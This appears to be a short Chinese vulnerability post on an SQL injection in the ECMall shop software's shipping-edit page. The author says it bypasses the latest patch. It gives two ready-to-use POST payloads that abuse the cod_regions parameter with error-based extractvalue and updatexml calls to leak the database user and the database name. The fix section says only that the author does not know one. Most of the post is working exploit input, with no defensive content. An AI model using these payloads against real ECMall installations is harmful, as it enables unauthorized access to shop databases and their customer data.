打了最新的补丁 绕过方法:updatexml函数 extractvalue函数 url: http://localhost/ecmall/index.php?app=my_shipping&act=edit&shipping_id=1 payload1: shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or extractvalue(1,concat(0x5c,(select user())))#]=v 效果: payload2: shipping_name=li&shipping_desc=asd&irst_price=10&step_price=0&enabled=1&sort_order=255&cod_regions[1' or updatexml(2,concat(0x7e,(database())),0)#]=v 效果:
修复方案:我不知道 |
-
上一篇: 天格科技某处越权漏洞可修改任意账户资料 - 网
下一篇: 置信经典OriTop管理系统sql注入以及任意文件下载
还没有人抢沙发呢~